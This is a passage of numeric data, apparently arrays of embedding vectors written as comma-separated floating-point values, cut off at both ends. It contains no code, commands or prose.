008657344,-0.00088025426,0.0073836846,-0.021399032,-0.013751504,0.016817134,0.012887599,-0.021109208,-0.019697066,0.0013361083,-0.013625034,-0.01606035,-0.026892412,0.020273572,-0.0066643246,-0.00055689283,-0.02393177,0.027264716,0.0076999026,-0.0005119702,0.0010423295,0.007583823,-0.007328852,0.012034899,0.012129284,0.013248302,0.0013184192,-0.014767849,0.030987028,-0.0045960266,0.015104714,-0.021053217,-0.003162411,0.0019179544,0.008373706,-0.0063734045,-0.01545865,-0.022700382,-0.010802077,-0.0037565632,0.009415044,-0.019115752,-0.01598142,-0.025250666,-0.01200637,-0.034556035,-0.013618479,-0.0072408933,-0.025526524,-0.008372882,0.015357743,0.02004587,-0.0153343035,-0.0024164335,-0.014268534,0.021657292,0.013638589,0.0045465506,0.0023673754,-0.038383573,0.022394262,-0.007732104,0.0038683193,-0.0035156165,-0.029452095,0.0044041383,-0.01783946,-0.0049271523,-0.016291583,0.0074166963,-0.013121267,-0.00046187348,0.0051971376,0.018824352,-0.0013799089,-0.011327969,0.014155757,-0.008444318,-0.007055171,-0.017461356,0.038507488,-0.025259277,0.03900984,-0.03047857,-0.0064379754,0.01681168,0.0026601288,-0.0019284234,0.005466723,0.013143378,-0.06947128,-0.019549882,0.008611384,-0.016270898,0.01516607,-0.014803555,0.041509487,0.0034351416,-0.026008338,0.02742794,0.013764583,0.007413218,0.028933264,0.04085799,-0.0015563217,-0.0065337187,-0.0081057055,-0.014329862,0.0037859764,-0.004745384,0.0037181166,-0.012637169,-0.002378794,0.027834002,0.03229851,-0.01891936,0.025026811,-0.030348074,-0.0043430086,0.006935645,-0.009520221,-0.028485985,-0.019580247,-0.0064033405,0.009743553,-0.0014614398,0.014658797,-0.0148736425,-0.017522337,-0.01293224,-0.0045702597,0.116383076,-0.003934436,-0.00600441,-0.027420018,-0.0114678275,-0.027416723,-0.014700552,0.013094561,-0.0024404386,-0.0010242333,0.0026545106,-0.0037965898,0.028095456,0.014929783,0.00588937,-0.019676313,-0.0037196735,0.06637383,-0.0116323335,0.035173632,0.024928639,-0.016807241,0.009284643,-0.009101501,0.0015736446,0.06648874,-0.004148511,-0.038018417,0.008307827,0.010152916,0.022808636,0.017150994,-0.0053273807,-0.008876301,0.000003894349,-0.0018110535,-0.01201605,-0.015552435,-0.016486403,0.013140626,-0.0021788357,-0.007652033,-0.0041256486,-0.022666298,-0.0116109755,0.0012141205,-0.019988403,-0.011736281,-0.0047213985,0.0206544,-0.004016195,-0.029511081,-0.0153877335,0.018540617,0.007904491,-0.023374205,0.005170661,-0.0043365364,-0.012698794,0.01750586,-0.00036899885,0.016090948,-0.010484045,0.023274144,-0.022562927,0.005902788,-0.010362101,0.0006429316,-0.0006128182,0.007911767,-0.0027284753,0.0018933219,-0.0035254317,0.014321728,-0.009402696,0.016190993,-0.017445372,0.0044198027,0.0039350064,-0.010302361,0.035613995,0.026080199,-0.023228645,0.0022806395,0.017191488,0.018819964,-0.011371178,-0.0048495946,-0.005937265,0.016331935,-0.005960234,-0.0016568677,0.003161511,-0.0035199346,0.003483235,0.019895937,-0.009920226,0.0013419711,-0.0043312716,-0.004317021,-0.0017738563,-0.0057327934,0.017595056,0.016438914,0.0026822754,-0.017395591,-0.003758456,-0.008317576,-0.017617553,0.0048559415,0.027708359,0.012346254,-0.01605817,0.0050615063,-0.019880762,-0.0066943164,0.012124412,0.0278428,-0.013292467,0.013448195,0.00033736444,0.013131284,0.026137747,-0.0051272437,-0.020973371,-0.0055963,0.013814989,-0.009907582,-0.013870261,-0.007847011,0.016636554,-0.020608852,0.010013519,0.028259,-0.021547552,-0.025285047,-0.0018661321,-0.022783576,0.011573368,0.018313348,-0.01239799,0.0110178115,-0.0020022602,-0.038420834,-0.006356794,-0.007039472,0.020849602,0.0024993555],[0.0036212504,-0.012135804,-0.0151387155,-0.018128376,0.0042932206,0.011368438,-0.004533222,0.028649563,0.0049344874,-0.007789596,-0.0063775987,0.0339159,0.0019575492,0.03555468,-0.008011415,-0.02284154,0.009924957,0.012428046,0.0090111615,-0.0040874863,0.0038495052,-0.0048483773,0.013590206,-0.005364933,-0.014598065,0.014063324,-0.0034514433,-0.0014648964,0.0017611162,0.0005539898,-0.0011453317,0.008851281,-0.0046960064,0.011589777,0.01605781,0.024131978,-0.0025986237,0.0055834395,-0.001002357,-0.020310614,0.023168685,0.011638425,-0.037432462,0.010823925,-0.008140614,-0.02023233,-0.011825279,-0.009147219,-0.006790473,0.010005281,-0.024683768,0.003459264,-0.014315577,0.015881928,0.002056321,-0.0000994322,-0.0035903712,-0.035901677,0.024825105,-0.008195176,-0.01180157,0.014324688,0.004412614,0.0062465575,0.02783345,-0.0010731127,0.0116212,-0.0016370631,-0.0071950634,-0.014421492,0.037791494,0.014139817,-0.014239853,-0.0011075374,-0.013774839,0.01701547,-0.0050762584,-0.003189301,-0.012234053,-0.013386704,-0.029580679,0.005294471,-0.00010155029,-0.0043555703,0.0059311423,0.0021984016,0.003671174,-0.008773039,-0.0027429787,-0.020859485,0.013991192,-0.011179919,-0.0045232326,0.016004674,-0.011776942,0.010000182,-0.006513126,0.009049737,-0.008443727,-0.014776441,0.004313266,-0.015396032,-0.025392825,0.013015546,-0.0049294485,-0.028878707,-0.012957232,0.020281713,-0.00021998699,0.004398565,-0.0032571924,0.0027053556,0.009465202,-0.022239719,-0.006707171,-0.0034417564,0.0043321457,0.0034534312,0.0039620027,0.0020636462,0.0028455744,-0.01076871,0.025303422,-0.007100198,-0.015652565,0.0130656585,-0.0010116344,0.0027685922,-0.015823716,-0.021853516,0.011932311,0.020419097,-0.008038945,0.002866469,0.0019298473,-0.016315572,0.010133346,0.0021521347,0.010607257,-0.033201113,0.024949193,-0.012188996,0.028837243,0.016304389,0.0028339063,0.006476328,0.0055346075,0.0035592897,0.017738106,-0.00600822,0.014164806,-0.012204221,-0.004570128,0.0019566277,0.0074952366,0.009207654,-0.025350895,-0.008994863,0.008301366,0.002065317,0.0031934245,-0.001355055,-0.013434428,0.023257729,-0.014316432,-0.0043966854,-0.006727576,-0.00324971,0.011336659,-0.0052821035,-0.0046618194,0.024153657,0.020589123,0.0023005703,-0.009950227,-0.0030043267,0.015298771,-0.00790327,-0.003496797,0.011742849,0.01066222,0.021978987,-0.0053809965,-0.019521313,-0.0021303035,0.01904044,0.009971248,0.015268188,0.0032833442,0.0070311814,-0.009534665,0.00303855,-0.019259116,0.006768185,-0.008530678,-0.008951684,-0.0057542254,0.111451104,-0.01100058,-0.013534218,-0.01609316,-0.0066171596,0.010945991,-0.032390725,-0.019123726,-0.017801844,-0.024376722,-0.005610777,0.0014738126,-0.01547948,0.01669374,0.017174141,0.008609425,0.028187592,0.0064095147,-0.082585946,0.028544437,0.0210408,-0.028174885,0.021952167,-0.008386416,0.005402825,-0.023852872,-0.0028551118,-0.0059845387,-0.0037130709,0.0063184947,-0.007916759,0.0002212672,-0.012956167,0.026538502,0.023417553,-0.029396325,-0.0014783832,-0.0019614191,-0.026691204,-0.00031312887,0.0012178705,-0.00077690865,0.0012241945,-0.022452716,0.0034887407,0.01539943,0.007172605,-0.021909619,-0.0040920484,0.013757598,0.0021635033,-0.01226644,-0.0060656285,-0.017456269,-0.023541385,0.010618175,0.027546668,-0.0015502311,-0.026171261,0.0032481828,0.004806727,0.012617595,-0.0043439083,-0.007195038,0.052143194,-0.004838271,0.006845419,0.045346566,-0.0018506102,0.026977029,-0.038626783,0.0014414884,-0.012749473,-0.04898413,0.01980718,0.007629283,-0.030247044,0.01386077,0.010753087,0.022074563,-0.014367207,0.0031153671,0.0026189398,-0.005617947,0.002324436,-0.0067706094,-0.012523862,-0.01889849,-0.004604314,0.025112325,-0.010494854,0.018615812,-0.010626424,-0.008027288,0.00058093935,0.039786346,0.00972309,0.0021744191,-0.013029485,-0.022381106,0.029597562,0.025411034,-0.014650549,0.003974833,-0.025344238,0.021677086,-0.0011925318,0.018308215,-0.013255215,0.0035826168,-0.011066055,0.00821939,0.0019230894,-0.017220223,-0.009142125,-0.014369613,-0.0037383563,-0.0013738563,0.01804284,0.0045285067,-0.012044536,0.008194155,0.02409696,0.005414004,-0.0035104475,0.008655309,0.00037820044,-0.001979972,-0.014099946,0.020830244,-0.0027910378,0.014008825,0.020545848,0.016703492,-0.017810274,0.008146878,0.024228726,-0.026410587,0.01538155,0.0036297997,0.0044361493,0.005047061,0.033503488,0.00027785293,-0.009957375,-0.0069371397,-0.011298357,-0.0036144236,0.0056091147,-0.009958703,-0.021795671,0.015550104,0.009330505,0.0169011,-0.0048101814,-0.009283213,0.010118611,0.005577233,-0.00068396464,-0.009633283,0.0009076082,-0.026993804,-0.006899985,0.021696748,-0.008336894,0.00906092,-0.002000412,0.086473025,0.031164503,0.016645037,0.029595792,-0.012754133,-0.0057232655,0.016224544,0.024753518,0.00844025,-0.013758884,-0.011007036,-0.015719224,-0.00978449,0.029362313,-0.006370377,-0.008410318,-0.016085071,0.0037480476,-0.011312715,-0.013337931,0.0426141,0.0011639129,-0.01227202,0.015004078,0.034654416,0.01576418,0.0046229134,-0.0061328528,-0.008870293,-0.0189717,0.007735399,-0.024178818,0.0027901116,0.012799262,-0.0015445502,0.01761065,0.010430723,-0.0034638871,-0.0010295168,-0.002243825,-0.0041270545,-0.002047463,-0.019274985,-0.0021240395,-0.01082643,0.03486076,0.004315448,-0.008081548,-0.0038379936,0.008018248,0.007921353,0.017813869,-0.016748793,0.007806424,-0.018625505,0.0074712657,0.019203233,-0.027841724,0.0119331265,0.020677581,0.013056845,0.013061173,-0.022684986,0.020543259,0.014240613,0.022445915,0.0015189763,-0.0135819,-0.036910698,-0.013688025,-0.008426599,0.029273136,0.0005996804,0.0044332854,-0.0094341645,0.002502304,0.00897322,-0.013670335,-0.015902026,0.035890635,0.011193929,-0.005309587,0.0068557085,0.004083515,-0.023165068,-0.0023789895,0.002059887,-0.0037567094,0.018144852,-0.020580102,0.03673408,0.003519529,0.008004032,-0.026433412,0.011250069,-0.009928773,0.011104116,0.0008966045,0.015342388,0.0077145137,-0.011903024,-0.003693182,0.0015170315,-0.01955626,-0.0025602633,-0.029407855,0.005130361,-0.009821085,0.005283788,0.012650774,-0.022851028,-0.009705138,-0.033117685,-0.003976472,-0.006247178,-0.014354267,0.00068182737,0.0048099435,-0.01783109,0.030021854,0.022650369,-0.0009025351,0.003954637,0.009261592,-0.013064331,0.021838345,0.0056615355,0.0008445304,0.011447956,0.016010968,0.007861256,0.0028558897,-0.004652654,-0.030319238,-0.0026042752,0.009491973,0.0044728904,-0.031496145,0.032407332,0.0036789833,0.0041146735,-0.0041874642,0.016421495,0.01971973,-0.0010530815,0.010441346,-0.0020942437,-0.0055295737,0.009017197,0.00629722,0.0042265384,-0.012563759,0.0021239817,-0.0061733588,-0.0005400383,0.012982134,0.017576989,-0.017629908,-0.019080883,0.0038411305,0.023018496,-0.03551537,0.021206496,0.005467738,0.002794272,0.0010456756,0.00300526,0.077364735,-0.008281859,-0.025756856,0.009920607,0.020717101,0.0003535919,0.017320873,0.00010439528,-0.008263926,0.0060851397,0.009103461,0.0038087352,-0.0041615763,0.03665299,-0.015895793,-0.0011873756,-0.011890366,-0.03354332,-0.007438268,0.006724767,-0.009918557,0.0016081001,0.0040205475,-0.024842158,-0.018444592,-0.012016125,0.014362256,0.02703555,0.017854493,-0.010020014,-0.0032403283,0.01348625,-0.0004889938,-0.003038937,0.004928237,-0.008505788,-0.0016194922,-0.0060969675,0.010733748,0.02589646,0.0039410708,-0.005677773,0.025397971,0.012376964,-0.0047159507,-0.016068641,-0.008798103,-0.007326764,0.0060143312,0.011606094,-0.01731218,0.0033252365,0.021150941,-0.00714048,0.0049559157,-0.014339083,0.021766711,0.019335153,0.007785326,0.015568593,-0.012779635,-0.0012919791,-0.0064674523,-0.020321826,0.012098802,0.014982786,0.021134632,0.011876515,-0.0016772278,-0.031750657,0.004309842,0.010212748,0.013998164,-0.012193051,0.018704003,0.013441483,-0.0015100292,0.029001135,0.021664456,-0.018075839,0.0061492925,0.019935137,0.004227475,-0.011298951,0.0010419431,0.0019727289,0.0040966477,0.009286553,-0.010933428,-0.023535812,0.0031452165,0.0033477223,0.0051592784,0.000566773,0.010879386,0.014679958,0.0077815126,0.004641245,0.007087237,0.007224151,-0.020545231,-0.024547247,0.00095971423,0.04725504,-0.0048589665,0.022048084,0.0033525305,-0.0057494477,0.024683615,-0.021785248,-0.0075173154,-0.042463258,0.005825463,0.019886892,0.02016343,-0.023817066,0.034933593,-0.01922419,0.032624643,0.0025934086,0.01247369,-0.01268168,-0.009036325,0.0009881838,0.017056024,0.021993743,-0.00039364194,-0.02364342,-0.0135641005,-0.0031972898,-0.056278862,0.0037695968,0.023427637,-0.006014248,0.004331894,0.00544946,0.01804968,-0.01117063,0.009151544,0.016334282,-0.010725129,0.0019044956,0.016572727,0.0022345746,-0.015099094,0.0017798512,0.010425927,-0.009157689,-0.0013441575,-0.012454052,-0.004329522,0.021938723,-0.015648026,-0.022171112,0.0044352147,-0.02116404,0.025603026,-0.014956032,0.028258799,0.0036194213,0.032101933,-0.004818779,0.008812111,0.034831215,-0.00008988833,0.024532085,-0.006761688,0.014013769,0.026749058,-0.008865501,-0.0011524389,0.009010923,0.011827132,0.0023345684,-0.03500496,-0.009820836,0.022732534,0.030470116,0.0060200617,-0.0048142304,-0.0027348383,-0.0024962686,0.01051685,0.007579659,0.017669652,0.008194798,0.01585594,0.01147947,0.00459237,-0.00046553058,-0.018442215,0.030599125,-0.017180875,-0.023861332,0.014362777,-0.00070736784,-0.021694379,0.016501013,-0.0031789765,0.00037660828,-0.019752512,-0.013896016,-0.009520354,-0.02830419,0.0053741876,0.0023027,0.015308658,-0.0139180925,-0.04233078,0.0007510101,0.016133748,0.0141560435,-0.021868067,-0.011509756,-0.030503118,-0.030692408,0.0033234416,-0.019473143,-0.01591984,-0.0019124505,0.018489053,-0.012621454,0.019251568,-0.0051672496,-0.021953862,0.003464652,0.025622562,0.0073058493,-0.0072300234,-0.0077737076,-0.002375379,0.012213435,0.017662587,0.0034419377,-0.023768235,-0.0033291478,0.015955033,-0.0128639005,-0.009362191,-0.008436756,0.014275017,0.009749945,0.007760475,-0.015880417,-0.011437533,-0.0065052025,-0.021000557,0.02336228,-0.028261969,-0.016271396,-0.011388287,0.003123982,-0.012489273,0.0031297088,-0.023032473,0.01069784,0.01420668,-0.0014003637,0.01775543,-0.012497113,0.007768087,0.017817961,0.006779847,-0.028804835,-0.011524109,-0.04415269,0.031268355,-0.03125309,0.005290572,-0.022713734,-0.019723078,-0.015210554,0.0039233435,0.0005034094,0.0020265798,0.0038410104,0.005355318,-0.03841857,0.01367545,0.0014755148,0.008393777,-0.003769796,0.0020621761,-0.012555743,-0.014230147,-0.009768244,-0.003902423,-0.013902291,0.0141428765,-0.011763798,-0.014678821,0.0033143691,-0.029374527,-0.032469872,0.004010885,-0.007853505,0.022412647,0.007525694,-0.000200031,-0.00598867,-0.033082683,-0.012758038,0.014557452,0.021584708,-0.02460382,-0.0031118288,0.0020937228,0.0030966692,0.018728111,0.021516394,-0.015849277,0.04446622,0.0016708926,-0.025244795,0.008699303,0.020932611,0.001311437,-0.0043507167,-0.017473897,-0.0080793705,0.002490823,0.0062156096,-0.015631117,0.021893818,0.011871086,-0.002085408,0.010603775,-0.0013322036,-0.012009739,-0.023150153,0.012994473,0.009072396,-0.006940069,-0.016242227,-0.0052761603,-0.0035426815,-0.008061199,-0.008299448,0.036372826,-0.0017584653,0.002589564,-0.0070625306,-0.0019070396,-0.011391736,-0.018772375,0.0023093638,0.0076997397,0.0058038,-0.007388015,0.021047693,0.014791221,0.023134492,0.011273364,-0.008117157,0.008475209,0.0035083694,-0.00325898,-0.00002617888,0.005290166,-0.024663517,0.003998429,0.008105034,-0.044065304,-0.006408674,-0.007074322,0.0075360434,-0.008180913,-0.0022965374,0.017869866,-0.020985318,-0.0016530827,0.026303308,0.0041544596,0.0030608687,-0.017001925,0.014977377,-0.0006471322,0.0019016481,-0.006672145,0.0006811351,0.015971866,0.0010982178,0.01740423,0.005386183,0.031145863,-0.0126260845,-0.02027068,0.0074043027,-0.01141842,0.012306206,-0.0028255626,-0.0053694905,0.026383594,0.030276762,-0.017624725,0.019941619,-0.02298935,-0.0014515809,0.04771553,-0.026875896,0.04468449,-0.0132176895,0.014253675,0.003012937,-0.016852714,0.012060474,0.0044042575,-0.008982064,0.031992927,0.0009867486,0.0003778356,-0.008068885,0.0047621373,-0.022411807,0.0011825333,0.025179543,0.00029689202,0.009134855,0.0036078673,-0.0016017272,0.0048377304,0.00968709,-0.015834631,-0.021247989,0.032844484,0.017728046,-0.0065382905,-0.006272309,-0.011962776,0.0042456817,-0.0010031913,0.01199074,-0.018333366,0.007286964,-0.022339687,0.0028318136,0.01867186,0.005282233,0.021289576,0.012391249,0.006878715,0.00094199105,-0.04113886,-0.0026639474,0.029958738,-0.020411579,-0.008411312,-0.0089382455,-0.0003368615,-0.012818661,0.031268783,-0.013506645,-0.02076799,0.004168596,-0.009515168,0.00046534726,0.018591182,0.010270228,-0.0038100358,-0.008411778,0.032888126,0.0020115424,0.02203619,0.0035439462,-0.0035530145,0.002798755,-0.017889567,-0.006774208,-0.014010181,-0.0029019422,0.02258239,-0.025624704,-0.011603198,0.0037145293,0.009148484,0.0074247103,-0.017750679,0.01512294,-0.0004114538,-0.0059596878,0.0036505202,-0.01460986,0.047142588,0.013070553,-0.011587973,-0.0068923985,-0.0003441373,0.0007041656,-0.014735793,-0.022490822,0.009930719,-0.044191204,0.027167102,0.0028002113,0.019647077,-0.0047474448,-0.022847557,0.00030421017,-0.017927859,-0.00058402284,0.025769884,0.0032659404,0.022227723,0.020656964,0.032046005,0.015238604,-0.012827589,0.014089259,-0.020611137,-0.0054771467,0.022990132,-0.0069870297,0.0011820169,-0.017598474,-0.01881285,0.0403614,0.022620425,-0.0056918096,-0.0014458462,-0.0009693812,-0.0079786545,0.032551438,-0.015316123,-0.012079797,-0.0005280842,0.08402518,0.003473171,-0.0036001615,-0.010043976,0.017994422,-0.002160934,0.0080248015,0.015701603,0.025538186,0.0006043838,-0.018785525,0.007452552,-0.004038641,-0.012292499,-0.0043145143,-0.008776336,0.023470834,-0.026743965,0.008532922,0.0026803808,-0.0058745807,0.012308892,-0.0011456683,-0.023936685,-0.03039853,0.02406476,0.0031139993,-0.0006679334,-0.012285859,0.0020612858,0.009390257,0.008939909,0.025329558,-0.032297894,0.0011735444,-0.015389736,-0.0068707205,0.021402424,0.01698531,-0.01946635,0.005946395,0.034046024,-0.018450266,-0.0123105785,-0.000775859,0.005472793,-0.022690414,-0.0031326895,-0.012078869,-0.0002926898,-0.013358358,0.0063040364,-0.012228732,0.012527259,-0.011001053,0.029761072,0.03730556,-0.0013425761,0.0163308,0.013581703,-0.0054857507,0.0039974637,0.014073831,0.028017014,0.0036173163,0.015230619,0.017943824,-0.00921367,0.009656874,-0.009573205,-0.021868825,-0.030929958,-0.004217625,0.02018858,0.0010157799,0.0014557214,-0.012556321,0.0012515564,0.018977845,0.0020421562,-0.010680467,0.008437014,-0.012575508,0.031068128,0.02161421,-0.011857788,-0.011894616,0.01429639,0.006558179,-0.022864401,0.008719252,0.0053421482,0.0067149084,0.010099646,-0.014553428,0.013983978,-0.002773922,-0.009833511,-0.01361291,-0.008627214,0.02178495,-0.034931965,0.02725054,0.017838258,0.008546826,-0.012970726,-0.00092999684,-0.016076857,0.038417734,0.0042389138,-0.0010153293,0.0076577803,0.01607057,-0.025909437,0.016539177,0.012996481,-0.031969454,-0.0022423023,-0.011403738,0.0016584622,-0.014764503,-0.029857097,0.011357674,0.024977202,0.03590106,0.0046633426,-0.006320163,0.02275365,-0.0020579328,-0.008918221,-0.0015132949,0.0041543026,0.005879915,0.010270383,0.034686103,0.018219756,-0.014101374,-0.0040998533,-0.0050192075,-0.0015794287,-0.028449941,-0.0062272893,0.0019105143,-0.011895584,-0.013695883,0.017528143,0.009987151,0.0030979107,0.01639162,0.0219396,-0.012078052,-0.016451811,-0.015381831,-0.00044875886,0.01494304,-0.00078740594,-0.0026801086,-0.018201442,-0.0042106896,0.0040559056,0.015708841,0.02068025,0.01696479,-0.020042202,0.0124109145,-0.029820113,0.007962213,0.0034317134,0.0007000797,-0.02951711,0.030794421,-0.014443009,-0.0018532684,0.007300361,-0.003034568,0.0023639372,0.009068942,-0.024113415,0.010112278,-0.00038130945,0.013043559,-0.017305743,0.015895987,-0.026650202,-0.015568126,-0.015544356,-0.006311446,0.00095214305,-0.0033663579,0.016192691,0.017992571,-0.014062612,-0.034391746,-0.012168154,0.014774835,-0.024663717,0.009005832,0.011112825,-0.0028763034,0.017745232,-0.01087223,0.025604919,0.0033247853,-0.0017341372,0.0031796019,0.014777779,-0.0025056086,0.020675367,-0.005721897,0.008194468,-0.0053511756,-0.015511397,0.0050554127,-0.024333183,-0.024239335,0.014108205,0.012696986,0.011944886,0.006474321,-0.009650056,-0.026362073,0.0024192694,0.0074242647,-0.010183401,0.07800767,0.0020889866,0.010186962,0.004892991,-0.0056869313,0.006791406,0.03270445,0.012608403,0.0438847,0.014516463,-0.0000926509,0.005005265,-0.007612313,0.0021574527,0.024675516,0.038106244,0.028560862,-0.007385223,0.014032713,-0.021908503,-0.014179402,0.01869251,0.004716101,-0.028417757,0.0047731763,-0.012796443,0.0004846368,-0.02564051,0.0034888403,0.010088333,-0.010470295,-0.015013366,0.02028716,-0.00991937,0.039341316,-0.025763916,-0.012960243,0.005005791,0.007363226,-0.029427612,0.048062682,-0.005587176,0.0010287138,0.010982936,0.001192149,-0.019467345,0.0895978,0.01710455,0.022572769,-0.023322517,0.0021336258,0.018020986,-0.021185726,0.024533805,0.008049379,-0.00020732882,0.00009077242,0.006749883,0.01635292,0.015247981,0.016374296,-0.0060578035,-0.006088154,-0.0019477577,0.016700389,-0.0002026431,-0.009726438,0.021810316,0.016377343,-0.0027245686,-0.013494367,0.018866705,-0.008505998,0.011511014,0.012643618,-0.0044503426,-0.0135015575,0.0149888825,0.012908217,0.022809546,0.0009344768,-0.05871509,-0.0013025434,0.14997785,0.003604654,0.014482619,0.0059939623,-0.005860347,0.0003162758,-0.024312422,0.007901556,0.004702882,-0.024705386,-0.008371809,-0.024813034,-0.02411852,0.029442376,0.017741777,0.014428219,0.0015390855,-0.047799103,0.015680145,-0.016093992,0.021884186,-0.0055920263,0.031211955,0.00135827,-0.029206844,-0.0016761721,0.02779402,-0.004199727,-0.0016299133,-0.0086171655,-0.014209869,0.0078050816,0.0024463036,0.009272748,-0.024324737,0.0063956175,0.021025438,0.019886121,0.002723751,-0.022157455,-0.009157598,0.0015017116,-0.019628393,-0.023960896,-0.14822927,-0.00079932745,0.01921339,-0.024235796,0.0041299234,0.01134997,0.007296044,-0.006126466,0.0061038956,-0.046470728,-0.022618389,-0.018149082,0.0013584167,0.0077395616,-0.008349945,-0.016123451,-0.005311534,-0.006185367,0.007957416,0.0018562028,0.011962938,0.015411839,0.003243443,-0.013593442,0.019367961,-0.0039035869,-0.00021108687,0.022487061,-0.021374477,0.014629813,-0.025899632,0.0010571455,-0.0047167917,-0.006009506,-0.026196282,-0.019221772,-0.036430173,0.0037912244,-0.029040262,0.014793983,0.0050818347,-0.0067495517,-0.0010038189,-0.019218205,-0.0067389593,0.0487036,0.023775691,0.023142612,-0.00788104,0.0110546835,0.055785157,0.017484078,-0.016577132,0.012299456,0.0016635042,-0.0030512826,-0.00728019,-0.023532283,-0.022232682,0.026700797,-0.011560801,-0.027574437,-0.012402541,-0.017149298,0.023156391,-0.012270349,-0.005867866,-0.028044546,0.0028537987,-0.0071179704,-0.003312599,-0.0029278481,0.0058758776,-0.03357574,0.012294485,0.023336241,-0.021170383,0.008319731,-0.006071339,-0.00826371,-0.023260383,-0.015339275,0.00038426882,-0.025497539,-0.013522098,-0.005186653,0.0034491543,-0.0021766538,-0.001195936,-0.010647175,0.018673763,0.023902124,0.02260582,0.028362606,-0.022165546,0.00050138665,0.026130114,0.027908662,-0.036807474,0.021767022,-0.0052388627,-0.009822481,-0.0174655,0.013324317,-0.021098046,0.0034045274,-0.00069206377,-0.01532881,-0.018191868,0.009317097,-0.005599137,0.018250786,-0.0049260105,-0.02481098,-0.02642931,-0.031806737,0.010268768,0.02141315,0.0013656869,-0.006581232,-0.028874857,-0.015027665,-0.0018017784,0.026367584,0.039586388,-0.004377607,-0.039383404,-0.005603014,0.014361278,-0.016803138,-0.00965896,0.0018521308,0.0016439693,0.012435633,-0.025560366,0.015294957,-0.00988412,0.0066672997,-0.018074602,0.01078105,0.0107396385,-0.019547308,-0.017513309,-0.011810139,0.044606894,-0.009612637,0.033373363,-0.017168937,-0.000120252225,0.0015332878,0.01811992,0.04336465,-0.012691561,-0.011717292,-0.009486403,0.08073971,-0.019311763,-0.018864447,0.002011846,-0.013674036,0.005836997,0.02107532,-0.010745848,-0.005424816,-0.022853753,-0.026105985,-0.005470463,-0.015657283,0.0038167706,-0.0031273665,0.017577754,0.0003783906,0.03108908,0.0010721439,0.021912696,0.011560984,-0.02157282,-0.005537903,0.047387104,0.030502217,-0.018817209,0.008722966,0.014382702,-0.011574588,0.017732665,-0.0032414822,-0.000094300645,0.01135014,-0.004869285,-0.007240173,-0.050575394,-0.022640351,0.0040600034,0.020885112,0.011562424,0.0051285163,-0.0019478658,0.011109676,-0.022762978,0.00030564453,0.005875362,-0.018555285,0.020863052,-0.0068611535,-0.008061869,0.0036377623,0.018715275,0.007280692,-0.033823296,-0.0064977095,-0.02366391,0.015063471,0.002098205,0.0017895132,0.005218588,0.016477183,-0.018711574,-0.010624829,0.0007405372,-0.0005108184,0.0051052207,0.0046774265,0.0021980514,0.032141674,0.014685308,-0.011025526,0.0029426024,0.000751622,0.013450586,-0.0072629796,0.0024252445,-0.014100533,0.010350451,-0.021405973,0.0021808017,-0.007448753,0.018926974,-0.0014464784,-0.0010024385,-0.021568304,-0.06772301,-0.019127287,0.007495962,-0.04135302,0.01739639,0.010534562,0.013882144,0.0037629593,-0.006830761,0.008481493,-0.008009813,0.007862681,0.008165792,0.024374396,-0.010032616,0.006378609,0.021815518,-0.009006882,-0.02118202,0.005448875,-0.015847672,-0.006144049,-0.029001525,0.004790706,-0.019286063,-0.027435167,-0.013133743,0.012753703,-0.026310464,0.00064716605,0.056196835,-0.029020613,-0.00069022615,0.0072247423,-0.014153671,0.0016992532,-0.0021839398,0.010071693,-0.01941402,0.04529398,-0.0046611074,0.0014198648,0.015137554,-0.018692048,0.016751787,-0.019489966,0.06027847,-0.008301576,0.023892645,0.008816093,-0.016488379,0.014881658,0.0032685397,0.0026683793,0.0011031401,-0.010433321,0.014557574,-0.005926665,-0.0013312541,0.0005083575,0.012901197,0.008436226,0.0039051538,-0.016149737,-0.0012882175,-0.02155261,-0.0016100174,-0.0016191236,-0.00063486234,-0.004519256,0.010031583,-0.029483965,-0.006756173,-0.0028799942,0.00043743945,-0.03433775,0.02641936,0.003630948,-0.017365757,-0.02584597,0.0044623925,0.025412,-0.016996045,0.015738478,0.0028183802,-0.00070307165,-0.03262521,0.014681106,0.016043864,-0.010566167,0.013216974,-0.001821735,-0.0134331845,-0.010410157,0.01939004,0.01347042,0.019214394,-0.01677316,0.003740731,0.013514908,0.008618061,-0.0035592201,0.013391638,0.00013866248,-0.007468356,0.0036377488,0.017580668,0.027226018,-0.011850635,-0.015584617,0.00041079315,0.010898891,-0.02432155,0.0026190374,0.01241489,-0.0046044197,0.038391404,-0.012463497,-0.044960544,0.010438572,-0.0012454479,-0.011248935,-0.013083033,-0.0228028,0.011926645,-0.021705197,0.013860629,-0.00032098,-0.014396974,0.00678965,-0.012358647,0.004444026,0.012441646,-0.0074306517,-0.030256048,-0.0048380997,-0.018058516,0.0037241194,-0.002046267,-0.02425975,-0.0001429199,-0.017391399,0.09318559,-0.01561257,-0.022336558,-0.00919938,0.040028296,0.026184617,-0.0095302705,0.018255094,-0.01625536,0.009157227,-0.01082629,-0.02971159,0.008956224,0.0020253856,0.009093348,-0.028697997,0.0030800009,-0.0013688637,0.004231426,0.020656439,-0.0067549655,0.0057060355,0.024412772,-0.011440883,-0.013918894,-0.03117159,-0.010419529,0.003980469,-0.023018682,-0.008462716,-0.0026483715,-0.020124935,-0.014180026,-0.024893979,-0.028380524,-0.008979765,0.012657888,0.001863393,-0.011814681,0.014709056,0.00031296254,-0.00006003474,-0.0019294893,-0.0072293812,-0.0047173942,-0.026790548,0.020908624,-0.012874006,-0.013395261,0.013243863,-0.015662793,0.016966036,-0.021012714,0.00788625,0.010913454,0.01954087,-0.005415998,-0.013403644,-0.01004423,0.010019869,-0.010306038,-0.01852487,-0.005597593,-0.008939127,0.018838944,0.029856099,-0.011355125,-0.003733945,-0.018925557,-0.0090313675,-0.010291009,0.035013344,-0.0025637562,0.02106131,-0.0015190794,-0.0018290913,0.0020518715,-0.004734857,0.012582804,0.014636156,-0.010567477,0.00896392,-0.010683815,-0.0089293,0.0054394887,-0.0007710888,-0.02061672,-0.0006492263,-0.018180735,0.008508289,0.015218456,0.009600717,-0.0014284472,0.004436745,0.015072773,0.00119874,0.013186608,0.010168568,0.00956186,-0.036173664,0.0009388564,-0.008278351,0.01009027,0.0014463969,-0.015703041,0.0051259925,-0.08778278,0.0060463278,-0.027625253,-0.024263453,-0.013451258,-0.015821226,0.02264049,0.07912007,0.015291155,-0.061966553,0.005413909,0.022900205,0.019620823,-0.008750658,-0.0080254,0.0050182207,-0.010554201,-0.016971825,-0.006313992,0.011117398,0.024289062,0.010288755,0.0083204815,-0.0008941316,-0.008054399,0.01709045,-0.015330296,0.0107989535,0.011056144,0.0039188024,-0.005380657,-0.0047101094,0.002370015,0.015973601,-0.014140824,0.0009727098,-0.011956202,0.01431135,0.010487776,0